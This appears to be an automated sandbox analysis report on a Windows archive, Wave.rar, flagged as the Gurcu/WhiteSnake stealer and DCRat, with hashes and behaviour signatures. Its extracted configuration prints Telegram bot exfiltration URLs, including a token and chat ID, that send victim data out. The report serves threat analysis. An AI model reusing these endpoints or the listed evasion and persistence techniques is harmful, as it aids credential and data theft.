General

  • Target

    Wave.rar

  • Size

    5.8MB

  • Sample

    240704-w812jsvdrc

  • MD5

    f8f3ea18a2670f9c314ebcfc4c6b644f

  • SHA1

    9abcee5e18e138743fb73ad16445b4df128bd046

  • SHA256

    cf4abf0a76c5310d2c85a7ae11942ea8679c5e35d3f9d09e28db638428efc2b5

  • SHA512

    2545bc9f34dbfc5894d7dc5477a86292089de3ba9d5eb80ef4aed312ebad351fd4fb2aa050b6f2c4332e4d71c68243c3f77cb80f0a53a1ef8ab2583166de4eba

  • SSDEEP

    98304:IcAr1vsy4g3uEwL13D0vBisoR6xwv8kApilwY0tWDWGlLkr8Kf0RHSBdJz:IcArtsu3uEwp3jsBmApil10t+WIkoKfF

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendPhoto?chat_id=7391062786&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%208f21045c62c00476fa1fad6a7d6fb9a03faa10e3%0A%E2%80%A2%20Comment%3A%20proliv%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20ENXQHETB%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CmswebFonthost%5Clsass.ex

https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendDocument?chat_id=7391062786&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%208f21045c62c00476fa1fad6a7d6fb9a03faa10e3%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A27.526563

Targets

    • Target

      Wave.exe

    • Size

      8.7MB

    • MD5

      658cf2d0529f97f6f04bb78b151dc207

    • SHA1

      4af0fb55a3343f885f43af09bd11f235dcfded2d

    • SHA256

      85edeebdb49bff8eede6ecc42928d9b0f6d120b0e4a3a88fe59c9b7cb62b2cac

    • SHA512

      d2361c08291037d177cbe8b546cb65fbfc5361fe676114919edc69bbecc90b31dd37ef9ef41ceab00b560ee26e264eaa702eeb32bb9ff5659767a2c41b9a7dce

    • SSDEEP

      196608:WCpTIWsrEhW5hcePglVrOUv5JpkMZxShCZxD43eQpMqX:Wg89rEShcWgldrjwcZxD4OQeqX

    • DcRat

      DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    • Gurcu, WhiteSnake

      Gurcu is a malware stealer written in C#.

    • Modifies WinLogon for persistence

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • DCRat payload

      Detects payload of DCRat, commonly dropped by NSIS installers.

    • Identifies VirtualBox via ACPI registry values (likely anti-VM)

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Downloads MZ/PE file

    • .NET Reactor proctector

      Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Themida packer

      Detects Themida, an advanced Windows software protection system.

    • Accesses cryptocurrency files/wallets, possible credential harvesting

    • Adds Run key to start application

    • Blocklisted process makes network request

    • Checks for any installed AV software in registry

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Checks whether UAC is enabled

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Drops file in System32 directory

    • Suspicious use of NtSetInformationThreadHideFromDebugger

MITRE ATT&CK Enterprise v15

Tasks